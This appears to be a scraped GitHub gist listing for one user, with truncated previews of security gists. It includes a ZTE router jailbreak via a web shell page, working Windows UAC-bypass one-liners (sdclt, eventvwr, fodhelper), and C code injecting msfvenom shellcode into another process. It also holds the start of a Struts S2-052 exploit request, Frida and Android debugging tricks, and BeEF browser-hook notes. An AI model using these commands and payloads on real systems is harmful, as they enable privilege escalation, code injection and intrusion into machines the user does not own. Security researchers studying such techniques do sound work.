Malayke


Mounting JFFS2 Images on a Linux PC

It is possible to mount a binary JFFS2 image on a Linux PC without a flash device. This can be useful for examining the contents of the image, making required changes, and creating a new image in any format. When a JFFS2 image is copied directly from a JFFS2 flash partition, the resulting image is the size of the source partition, regardless of how much space is actually used for storage. Mounting the filesystem and using the mkfs.jffs2 utility to create a new image will result in a JFFS2 image without blank nodes. This can also be used to create multiple images for flashes with different characteristics, such as erase block sizes. This page describes two different methods of mounting JFFS2 images on a Linux PC.

This procedure requires that the following kernel modules are available or built-in to the kernel on the development machine: mtdram, mtdblock, jffs2, block2mtd, and loop.

Mounting JFFS2 Images using RAM

One method of mounting JFFS2 images uses the mt

@Malayke
Malayke / ZTE F460 Router Jailbreak.md
Last active June 9, 2025 15:16
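Jailbreak method for the ZTE F460 China Telecom optical modem

The optical modem I had been using accidentally got water in it and burned out, so I got a ZTE F460 to use instead. There are countless methods online, but none of the ones I tried worked. China Telecom is very sneaky: as soon as the LOID is registered, they turn telnet off on you, and then you can't do anything. After working on it for a whole day today, I succeeded in getting the telecomadmin password and can now telnet into the router at any time.

Why jailbreak it?

Without jailbreaking you only have ordinary user privileges: apart from the Wi-Fi password you can't change anything, and the Wi-Fi name has to start with ChinaNet. Worse still, China Telecom can remotely control the router at any time.

How to jailbreak it?

The simplest way is to connect to the router by cable or wirelessly, visit http://192.168.1.1/web_shell_cmd.gch, and then run the following commands to obtain the superuser password.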

@Malayke
Malayke / .bat
Created November 25, 2018 04:49 — forked from initpwn/.bat
Fileless UAC Bypass
#sdclt fileless UAC bypass
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
#eventvwr fileless UAC bypass
%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
#fodhelper fileless UAC bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\
@Malayke
Malayke / release-android-debuggable.md
Created November 4, 2018 13:38 — forked from nstarke/release-android-debuggable.md
How to make a Release Android App debuggable

Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage (or adb shell run-as com.mypackage ls /data/data/com.mypackage/shared_prefs), but on a production release app downloaded from an app store you're most likely to see:

run-as: Package 'com.mypackage' is not debuggable
@Malayke
Malayke / NotCreateRemoteThread.c
Created September 9, 2018 15:10 — forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
@Malayke
Malayke / getMoreDomains.py
Created September 9, 2018 05:02 — forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Convert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
@Malayke
Malayke / frida-enumerate-loaded-classes.py
Last active December 13, 2017 10:49
Use Frida to get the class names of a hardened (packed) APK
import frida, sys
def on_message(message, data):
    if message['type'] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)
jscode = """
Java.perform(function() {
@Malayke
Malayke / gist:43f51f9073feff7a67f847e20da4072b
Created September 6, 2017 02:15
S2-052 CVE-2017-9805 POC
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: localhost:8080
Content-Length: 1670
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client
https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM
window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24
Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67
Within beef.net.browser_details() we gather response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503